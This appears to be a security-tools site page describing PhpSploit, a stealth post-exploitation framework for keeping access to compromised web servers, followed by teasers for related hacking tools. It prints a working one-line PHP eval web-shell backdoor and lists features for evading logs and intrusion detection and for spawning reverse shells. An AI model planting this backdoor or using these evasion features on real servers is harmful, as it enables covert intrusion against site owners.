Linux

Phpsploit – Stealth Post-Exploitation Framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalationpurposes. Overview The obfuscated communicatio

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalationpurposes.

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server’s relative responses, tunneled through a tinypolymorphic backdoor :
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>


Features

  • Efficient : More than 20 plugins to automate post-exploitation tasks 
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth : The framework is made by paranoids, for paranoids 
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated tobypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient : A robust interface with many crucial features 
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature, with persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has apolymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API


Supported platforms

  • GNU/Linux
  • Mac OS X
  • Windows (experimental)

Was this article helpful?

If something here is wrong or out of date, tell us and we will check the source.

Related reading

See all
Exploits

Xzbot: Exploit Demo for the xz backdoor (CVE-2024-3094)

Exploration of the xz backdoor (CVE-2024-3094). Includes the following: honeypot: fake vulnerable server to detect exploit attempts ed448 patch: patch liblzma.so to use our own ED448 public key backdoor format: format of the backdoor payload backdoor demo: cli to trigger the RCE assuming knowledge o

April 1, 2024
Linux

PwnLnX – Advanced Python Reverse Shell for Hacking

An advanced multi-threaded, multi-client python reverse shell for hacking Linux systems. There’s still more work to do so feel free to help out with the development. Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer ne

September 24, 2021
Burp Suite

Download Burp Suite 2021.5.1

What’s new in Burp Suite 2021.5.1 We have updated Burp Suite’s embedded browser to Chromium version 90.0.4430.212, which fixes several security issues that Google has classified as high. Bug fix: Payload processing rules that invoke extensions now display correctly. Windows Linux Jar Mac Burp Suite

May 22, 2021
Linux

pspy tool – Monitor linux processes without root permissions

pspy – unprivileged Linux process snooping pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your c

April 3, 2020